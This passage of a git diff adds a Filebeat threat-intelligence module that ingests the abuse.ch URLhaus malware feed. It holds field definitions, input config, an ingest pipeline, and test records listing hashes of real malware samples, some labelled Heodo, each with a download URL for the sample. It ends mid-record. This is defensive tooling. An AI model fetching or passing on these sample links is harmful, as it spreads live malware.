https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html.' + example: 0c6803c4e922103c4dca5963aad36ddf + - name: indicator.file + type: group + fields: + - name: hash + type: group + fields: + - name: tlsh + type: keyword + description: > + The file's import tlsh, if available. + - name: ssdeep + type: keyword + description: > + The file's ssdeep hash, if available. + - name: md5 + type: keyword + description: > + The file's md5 hash, if available. + - name: sha1 + type: keyword + description: > + The file's sha1 hash, if available. + - name: sha256 + type: keyword + description: > + The file's sha256 hash, if available. + - name: sha512 + type: keyword + description: > + The file's sha512 hash, if available. + - name: type + type: keyword + ignore_above: 1024 + description: > + The file type + - name: size + type: long + description: > + The file's total size + - name: name + type: keyword + description: > + The file's name + - name: indicator.url + type: group + fields: + - name: domain + type: keyword + description: > + Domain of the url, such as "www.elastic.co". + - name: extension + type: keyword + ignore_above: 1024 + description: > + The field contains the file extension from the original request + - name: fragment + type: keyword + ignore_above: 1024 + description: > + Portion of the url after the `#`, such as "top". + - name: full + type: keyword + description: > + If full URLs are important to your use case, they should be stored + in `url.full`, whether this field is reconstructed or present in the event + source. + - name: original + type: keyword + description: > + Unmodified original url as seen in the event source. + Note that in network monitoring, the observed URL may be a full URL, whereas + in access logs, the URL is often just represented as a path. + This field is meant to represent the URL as it was observed, complete or not. + - name: password + type: keyword + ignore_above: 1024 + description: > + Password of the request. + - name: path + type: keyword + description: > + Path of the request, such as "/search". + - name: port + type: long + format: string + description: > + Port of the request, such as 443. + - name: query + type: keyword + ignore_above: 1024 + description: > + The query field describes the query string of the request, such + as "q=elasticsearch". + The `?` is excluded from the query string. If a URL contains no `?`, there + is no query field. If there is a `?` but no query, the query field exists + with an empty string. The `exists` query can be used to differentiate between + the two cases. + - name: registered_domain + type: keyword + description: > + The highest registered url domain, stripped of the subdomain. + For example, the registered domain for "foo.example.com" is "example.com". + This value can be determined precisely with a list like the public suffix + list (http://publicsuffix.org). Trying to approximate this by simply taking + the last two labels will not work well for TLDs such as "co.uk". + - name: scheme + type: keyword + ignore_above: 1024 + description: > + Scheme of the request, such as "https". + - name: subdomain + type: keyword + ignore_above: 1024 + description: > + The subdomain portion of a fully qualified domain name includes + all of the names except the host name under the registered_domain. In a partially + qualified domain, or if the the qualification level of the full name cannot + be determined, subdomain contains all of the names below the registered domain. + For example the subdomain portion of "www.east.mydomain.co.uk" is "east". + If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", + the subdomain field should contain "sub2.sub1", with no trailing period. + - name: top_level_domain + type: keyword + ignore_above: 1024 + description: > + The effective top level domain (eTLD), also known as the domain + suffix, is the last part of the domain name. For example, the top level domain + for example.com is "com". + This value can be determined precisely with a list like the public suffix + list (http://publicsuffix.org). Trying to approximate this by simply taking + the last label will not work well for effective TLDs such as "co.uk". + - name: username + type: keyword + ignore_above: 1024 + description: > + Username of the request. + - name: indicator.x509 + type: group + fields: + - name: serial_number + type: keyword + ignore_above: 1024 + description: Unique serial number issued by the certificate authority. For consistency, + if this value is alphanumeric, it should be formatted without colons and uppercase + characters. + example: 55FBB9C7DEBF09809D12CCAA + - name: issuer + type: keyword + ignore_above: 1024 + description: Name of issuing certificate authority. Could be either Distinguished Name (DN) or Common Name (CN), depending on source. + example: C=US, O=Example Inc, OU=www.example.com, CN=Example SHA2 High Assurance + Server CA + - name: subject + type: keyword + ignore_above: 1024 + description: Name of the certificate subject entity. Could be either Distinguished Name (DN) or Common Name (CN), depending on source. + example: C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net + - name: alternative_names + type: keyword + ignore_above: 1024 + description: List of subject alternative names (SAN). Name types vary by certificate + authority and certificate type but commonly contain IP addresses, DNS names + (and wildcards), and email addresses. + example: '*.elastic.co' \ No newline at end of file diff --git a/x-pack/filebeat/module/threatintel/abusemalware/_meta/fields.yml b/x-pack/filebeat/module/threatintel/abusemalware/_meta/fields.yml new file mode 100644 index 000000000000..55f8657bc6ec --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abusemalware/_meta/fields.yml @@ -0,0 +1,34 @@ +- name: abusemalware + type: group + description: > + Fields for AbuseCH Malware Threat Intel + fields: + - name: file_type + type: keyword + description: > + File type guessed by URLhaus. + + - name: signature + type: keyword + description: > + Malware familiy. + + - name: urlhaus_download + type: keyword + description: > + Location (URL) where you can download a copy of this file. + + - name: virustotal.result + type: keyword + description: > + AV detection ration. + + - name: virustotal.percent + type: float + description: > + AV detection in percent. + + - name: virustotal.link + type: keyword + description: > + Link to the Virustotal report. \ No newline at end of file diff --git a/x-pack/filebeat/module/threatintel/abusemalware/config/config.yml b/x-pack/filebeat/module/threatintel/abusemalware/config/config.yml new file mode 100644 index 000000000000..5922dd8838a5 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abusemalware/config/config.yml @@ -0,0 +1,42 @@ +{{ if eq .input "httpjson" }} + +type: httpjson +config_version: "2" +interval: {{ .interval }} + +request.method: GET +{{ if .ssl }} + - request.ssl: {{ .ssl | tojson }} +{{ end }} +request.url: {{ .url }} +request.transforms: +- set: + target: header.Content-Type + value: application/json + +response.split: + target: body.payloads + +{{ else if eq .input "file" }} + +type: log +paths: +{{ range $i, $path := .paths }} + - {{$path}} +{{ end }} +exclude_files: [".gz$"] + +{{ end }} + +tags: {{.tags | tojson}} +publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} + +processors: + - decode_json_fields: + document_id: "md5_hash" + fields: [message] + target: json + - add_fields: + target: '' + fields: + ecs.version: 1.6.0 diff --git a/x-pack/filebeat/module/threatintel/abusemalware/ingest/pipeline.yml b/x-pack/filebeat/module/threatintel/abusemalware/ingest/pipeline.yml new file mode 100644 index 000000000000..0ff51bf0528c --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abusemalware/ingest/pipeline.yml @@ -0,0 +1,138 @@ +description: Pipeline for parsing Abuse.ch Malware Threat Intel +processors: + +#################### +# Event ECS fields # +#################### +- set: + field: event.ingested + value: '{{_ingest.timestamp}}' +- set: + field: event.kind + value: enrichment +- set: + field: event.category + value: threat +- set: + field: event.type + value: indicator + +###################### +# General ECS fields # +###################### +- rename: + field: json + target_field: threatintel.abusemalware + ignore_missing: true + +##################### +# Threat ECS Fields # +##################### +- date: + field: threatintel.abusemalware.firstseen + target_field: threatintel.indicator.first_seen + formats: + - "yyyy-MM-dd HH:mm:ss z" + - "yyyy-MM-dd HH:mm:ss Z" + - "yyyy-MM-dd HH:mm:ss" + if: "ctx?.threatintel?.abusemalware.firstseen != null" +- set: + field: threatintel.indicator.type + value: file +- rename: + field: threatintel.abusemalware.file_size + target_field: threatintel.indicator.file.size + ignore_missing: true +- rename: + field: threatintel.abusemalware.file_type + target_field: threatintel.indicator.file.type + ignore_missing: true +- rename: + field: threatintel.abusemalware.urlhaus_download + target_field: event.reference + ignore_missing: true +- convert: + field: threatintel.indicator.file.size + type: long + ignore_missing: true +- rename: + field: threatintel.abusemalware.md5_hash + target_field: threatintel.indicator.file.hash.md5 + ignore_missing: true +- rename: + field: threatintel.abusemalware.sha256_hash + target_field: threatintel.indicator.file.hash.sha256 + ignore_missing: true +- rename: + field: threatintel.abusemalware.imphash + target_field: threatintel.indicator.file.pe.imphash + ignore_missing: true +- rename: + field: threatintel.abusemalware.ssdeep + target_field: threatintel.indicator.file.hash.ssdeep + ignore_missing: true +- rename: + field: threatintel.abusemalware.tlsh + target_field: threatintel.indicator.file.hash.tlsh + ignore_missing: true +- append: + field: related.hash + value: '{{ threatintel.indicator.file.hash.md5 }}' + if: ctx?.threatintel?.indicator?.file?.hash?.md5 != null +- append: + field: related.hash + value: '{{ threatintel.indicator.file.hash.sha256 }}' + if: ctx?.threatintel?.indicator?.file?.hash?.sha256 != null +- append: + field: related.hash + value: '{{ threatintel.indicator.file.hash.ssdeep }}' + if: ctx?.threatintel?.indicator?.file?.hash?.ssdeep != null +- append: + field: related.hash + value: '{{ threatintel.indicator.file.pe.imphash }}' + if: ctx?.threatintel?.indicator?.file?.pe?.imphash != null +- append: + field: related.hash + value: '{{ threatintel.indicator.file.pe.tlsh }}' + if: ctx?.threatintel?.indicator?.file?.pe?.tlsh != null + +###################### +# Cleanup processors # +###################### +- set: + field: threatintel.indicator.type + value: unknown + if: ctx?.threatintel?.indicator?.type == null +- script: + lang: painless + if: ctx?.threatintel != null + source: | + void handleMap(Map map) { + for (def x : map.values()) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + map.values().removeIf(v -> v == null); + } + void handleList(List list) { + for (def x : list) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + } + handleMap(ctx); +- remove: + field: + - threatintel.abusemalware.firstseen + - message + ignore_missing: true +on_failure: +- set: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/x-pack/filebeat/module/threatintel/abusemalware/manifest.yml b/x-pack/filebeat/module/threatintel/abusemalware/manifest.yml new file mode 100644 index 000000000000..e3159060cd81 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abusemalware/manifest.yml @@ -0,0 +1,16 @@ +module_version: 1.0 + +var: + - name: input + default: httpjson + - name: interval + default: 60m + - name: url + default: "https://urlhaus-api.abuse.ch/v1/payloads/recent/" + - name: ssl + - name: tags + default: [threatintel-abusemalware, forwarded] + +ingest_pipeline: + - ingest/pipeline.yml +input: config/config.yml diff --git a/x-pack/filebeat/module/threatintel/abusemalware/test/abusechmalware.ndjson.log b/x-pack/filebeat/module/threatintel/abusemalware/test/abusechmalware.ndjson.log new file mode 100644 index 000000000000..0d67f2a7086e --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abusemalware/test/abusechmalware.ndjson.log @@ -0,0 +1,25 @@ +{"md5_hash":"7871286a8f1f68a14b18ae475683f724","sha256_hash":"48a6aee18bcfe9058b35b1018832aef1c9efd8f50ac822f49abb484a5e2a4b1f","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:14:05","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/48a6aee18bcfe9058b35b1018832aef1c9efd8f50ac822f49abb484a5e2a4b1f/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG5:X5DpBw/KViMTB1MnEWk0115JW","tlsh":"1344D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"7b4c77dc293347b467fb860e34515163","sha256_hash":"ec59538e8de8525b1674b3b8fe0c180ac822145350bcce054ad3fc6b95b1b5a4","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:11:41","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/ec59538e8de8525b1674b3b8fe0c180ac822145350bcce054ad3fc6b95b1b5a4/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGY:X5DpBw/KViMTB1MnEWk0115Jr","tlsh":"4E44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"373d34874d7bc89fd4cefa6272ee80bf","sha256_hash":"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:11:22","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7/","virustotal":{"result":"25 / 66","percent":"37.88","link":"https://www.virustotal.com/gui/file/b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7/detection/f-b0e914d"},"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGG:X5DpBw/KViMTB1MnEWk0115Jd","tlsh":"7544D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"e2e02aae857488dbdbe6631c29abf3f8","sha256_hash":"7483e834a73fb6817769596fe4c0fa01d28639f52bbbdc2b8a56c36d466dd7f8","file_type":"dll","file_size":"284672","signature":null,"firstseen":"2021-01-14 06:11:21","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/7483e834a73fb6817769596fe4c0fa01d28639f52bbbdc2b8a56c36d466dd7f8/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ9:0h3eZgRQCcw+MN54dEq7kqRtoLZH","tlsh":"5554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717"} +{"md5_hash":"3e988e32b0c3c230d534e286665b89a5","sha256_hash":"760e729426fb115b967a41e5a6f2f42d7a52a5cee74ed99065a6dc39bf89f59b","file_type":"unknown","file_size":"352","signature":null,"firstseen":"2021-01-14 06:08:02","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/760e729426fb115b967a41e5a6f2f42d7a52a5cee74ed99065a6dc39bf89f59b/","virustotal":null,"imphash":null,"ssdeep":"6:TE6ll8uXi0jIAv6BHvPuA7RKTmOQamsQMGvMQgTYbtsWsQ72hCqPZG/:TTll8uTo5uA7RKtQamsS0QJfsQ7mCR","tlsh":"3CE0C002AB26C036500D154C221655B3B871911503CA14E6A6824BEA765D4A3290D190"} +{"md5_hash":"dcc20d534cdf29eab03d8148bf728857","sha256_hash":"86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:08:02","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac/","virustotal":{"result":"27 / 69","percent":"39.13","link":"https://www.virustotal.com/gui/file/86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac/detection/f-86655c0"},"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGI:X5DpBw/KViMTB1MnEWk0115JH","tlsh":"0D44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"f6facbf7a90b9e67a6de9f6634eb40ba","sha256_hash":"e91c9e11d3ce4f55fabd7196279367482d2fabfa32df81e614b15fc53b4e26be","file_type":"dll","file_size":"284672","signature":null,"firstseen":"2021-01-14 06:07:53","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/e91c9e11d3ce4f55fabd7196279367482d2fabfa32df81e614b15fc53b4e26be/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ1:0h3eZgRQCcw+MN54dEq7kqRtoLZL","tlsh":"2554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717"} +{"md5_hash":"44325fd5bdda2e2cdea07c3a39953bb1","sha256_hash":"beedbbcacfc34b5edd8c68e3e4acf364992ebbcd989548e09e38fa03c5659bac","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:07:41","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/beedbbcacfc34b5edd8c68e3e4acf364992ebbcd989548e09e38fa03c5659bac/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Jg","tlsh":"A044D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"4c549051950522a3f1b0814aa9b1f6d1","sha256_hash":"7cba55da723c0e020267a02e6ffc83e03a83701757fc4ec65ea398618ad881cf","file_type":"dll","file_size":"277504","signature":"Heodo","firstseen":"2021-01-14 06:07:31","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/7cba55da723c0e020267a02e6ffc83e03a83701757fc4ec65ea398618ad881cf/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG4:X5DpBw/KViMTB1MnEWk0115Jv","tlsh":"4544D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"d7333113098d88b6a5dd5b8eb24f9b87","sha256_hash":"426be5e085e6bbad8430223dc89d8d3ced497133f8d478fd00005bcbb73399d4","file_type":"dll","file_size":"284672","signature":null,"firstseen":"2021-01-14 06:07:07","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/426be5e085e6bbad8430223dc89d8d3ced497133f8d478fd00005bcbb73399d4/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJw:0h3eZgRQCcw+MN54dEq7kqRtoLZW","tlsh":"9454CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717"} +{"md5_hash":"c8dbb261c1f450534c3693da2f4b479f","sha256_hash":"25093afdaeb3ea000743ab843360a6b64f58c0a1ab950072ba6528056735deb9","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:07:07","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/25093afdaeb3ea000743ab843360a6b64f58c0a1ab950072ba6528056735deb9/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGe:X5DpBw/KViMTB1MnEWk0115JR","tlsh":"F344D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"714953f1d0031a4bb2f0c44afd015931","sha256_hash":"b3327a96280365e441057f490df6261c9a2400fd63719eb9a7a0c9db95beecc5","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:07:06","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/b3327a96280365e441057f490df6261c9a2400fd63719eb9a7a0c9db95beecc5/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115J7","tlsh":"F644D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"20fd22742500d4cec123398afc3d3672","sha256_hash":"e92b54904391c171238863b584355197ba4508f73320a8e89afbb5425fc2dc4b","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:07:00","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/e92b54904391c171238863b584355197ba4508f73320a8e89afbb5425fc2dc4b/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115JP","tlsh":"BE44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"aa81ceea053797a6f8c38a0f2f9b80b0","sha256_hash":"dd15e74b3cd3a4fdb5f47adefd6f90e27d5a20e01316cc791711f6dce7c0f52e","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:06:36","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/dd15e74b3cd3a4fdb5f47adefd6f90e27d5a20e01316cc791711f6dce7c0f52e/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGf:X5DpBw/KViMTB1MnEWk0115Jo","tlsh":"CC44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"a2ce6795664c0fa93b07fa54ba868991","sha256_hash":"0fae1eeabc4f5e07bd16f7851aec5ab6032d407c7ff0270f2b6e85c2a3efebd1","file_type":"dll","file_size":"277504","signature":"Heodo","firstseen":"2021-01-14 06:06:13","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/0fae1eeabc4f5e07bd16f7851aec5ab6032d407c7ff0270f2b6e85c2a3efebd1/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGD:X5DpBw/KViMTB1MnEWk0115JY","tlsh":"8C44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"9b9bac158dacb9c2f5511e9c464a7de4","sha256_hash":"07a9d84c0b2c8cf1fd90ab409b9399d06920ab4b6efb647b5a3b9bef1045ee7e","file_type":"dll","file_size":"280064","signature":null,"firstseen":"2021-01-14 06:05:52","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/07a9d84c0b2c8cf1fd90ab409b9399d06920ab4b6efb647b5a3b9bef1045ee7e/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKk:W5MT4WNaHy9P1FjbrjlKk","tlsh":"6B54CF217A53C826F5E800FCA6E9878914167F346F44A4C773D40F6AA8759E2EF2B317"} +{"md5_hash":"e48e3fa5e0f7b21c1ecf1efc81ff91e8","sha256_hash":"708c0193aec6354af6877f314d4b0e3864552bac77258bee9ee5bf886a116df5","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:05:51","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/708c0193aec6354af6877f314d4b0e3864552bac77258bee9ee5bf886a116df5/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGo:X5DpBw/KViMTB1MnEWk0115Jj","tlsh":"6644D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"8957f5347633ab4b10c2ae4fb92c8572","sha256_hash":"f70a3c016fe791eb30959961f0bcaa08ba7b738491b9ae61cb4a667cd1de8b37","file_type":"dll","file_size":"284672","signature":"Heodo","firstseen":"2021-01-14 06:05:50","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/f70a3c016fe791eb30959961f0bcaa08ba7b738491b9ae61cb4a667cd1de8b37/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJy:0h3eZgRQCcw+MN54dEq7kqRtoLZM","tlsh":"0754CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717"} +{"md5_hash":"09cc76b7077b4d5704e46e864575ff03","sha256_hash":"94ca186561b13fa9b1bf15f7e66118debc686b40d2a62a5cf4b3c6ca6ee1c7a1","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:05:36","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/94ca186561b13fa9b1bf15f7e66118debc686b40d2a62a5cf4b3c6ca6ee1c7a1/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Js","tlsh":"BB44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"98a1cdf7de4232363f1d1e0f33dbfd99","sha256_hash":"909f890dbc5748845cf06d0fb0b73a5c0cb17761f37e9cd4810eea0d0eb8627f","file_type":"dll","file_size":"284672","signature":null,"firstseen":"2021-01-14 06:05:16","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/909f890dbc5748845cf06d0fb0b73a5c0cb17761f37e9cd4810eea0d0eb8627f/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJQ:0h3eZgRQCcw+MN54dEq7kqRtoLZ+","tlsh":"C554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717"} +{"md5_hash":"8a51830c1662513ba6bd44e2f7849547","sha256_hash":"d1fa76346bef5bc8adaa615e109894a7c30f0bef07ab6272409c4056ea8d52aa","file_type":"dll","file_size":"284672","signature":"Heodo","firstseen":"2021-01-14 06:05:15","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/d1fa76346bef5bc8adaa615e109894a7c30f0bef07ab6272409c4056ea8d52aa/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJh:0h3eZgRQCcw+MN54dEq7kqRtoLZ/","tlsh":"1654CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717"} +{"md5_hash":"ae21d742a8118d6b86674aa5370bd6a7","sha256_hash":"3b9698b6c18bcba15ee33378440dd3f42509730e6b1d2d5832c71a74b1920e51","file_type":"dll","file_size":"280064","signature":null,"firstseen":"2021-01-14 06:05:12","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/3b9698b6c18bcba15ee33378440dd3f42509730e6b1d2d5832c71a74b1920e51/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKS:W5MT4WNaHy9P1FjbrjlKS","tlsh":"5454CF217A53C826F5E800FCA6E9878925167F346F44A4C373D40F6AA8759E2DF2B317"} +{"md5_hash":"78c9d88d24ed1d982a83216eed1590f6","sha256_hash":"d11edc90f0e879a175abc6e2ce5c94a263aa2a01cd3b6e8b9fdf93a51235ae99","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:04:38","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/d11edc90f0e879a175abc6e2ce5c94a263aa2a01cd3b6e8b9fdf93a51235ae99/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG8:X5DpBw/KViMTB1MnEWk0115Jr","tlsh":"6044D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} +{"md5_hash":"236577d5d83e2a8d08623a7a7f724188","sha256_hash":"8cd28fed7ebdcd79ea2509dca84f0a727ca28d4eaaed5a92cd10b1279ff16afa","file_type":"dll","file_size":"241664","signature":null,"firstseen":"2021-01-14 06:04:26","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/8cd28fed7ebdcd79ea2509dca84f0a727ca28d4eaaed5a92cd10b1279ff16afa/","virustotal":null,"imphash":"ed2860c18f5483e3b5388bad75169dc1","ssdeep":"6144:X1G3WVIOY6Bdjehj+qudd96ou/6mv5wdC:X1GmSafShjYdd96z/6cwdC","tlsh":"8D34BE41B28B8B4BD163163C2976D1F8953CFC909761CE693B64B22F0F739D0892E7A5"} +{"md5_hash":"ff60107d82dcda7e6726d214528758e7","sha256_hash":"fb25d13188a5d0913bbcf5aeff6c7e3208ad92a7d10ab6bed2735f4d43310a27","file_type":"dll","file_size":"277504","signature":null,"firstseen":"2021-01-14 06:04:20","urlhaus_download":"https://urlhaus-api.abuse.ch/v1/download/fb25d13188a5d0913bbcf5aeff6c7e3208ad92a7d10ab6bed2735f4d43310a27/","virustotal":null,"imphash":"68aea345b134d576ccdef7f06db86088","ssdeep":"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGz:X5DpBw/KViMTB1MnEWk0115JU","tlsh":"9244D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717"} diff --git a/x-pack/filebeat/module/threatintel/abusemalware/test/abusechmalware.ndjson.log-expected.json b/x-pack/filebeat/module/threatintel/abusemalware/test/abusechmalware.ndjson.log-expected.json new file mode 100644 index 000000000000..3a5116627250 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abusemalware/test/abusechmalware.ndjson.log-expected.json @@ -0,0 +1,735 @@ +[ + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/48a6aee18bcfe9058b35b1018832aef1c9efd8f50ac822f49abb484a5e2a4b1f/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "48a6aee18bcfe9058b35b1018832aef1c9efd8f50ac822f49abb484a5e2a4b1f", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG5:X5DpBw/KViMTB1MnEWk0115JW", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "48a6aee18bcfe9058b35b1018832aef1c9efd8f50ac822f49abb484a5e2a4b1f", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG5:X5DpBw/KViMTB1MnEWk0115JW", + "threatintel.indicator.file.hash.tlsh": 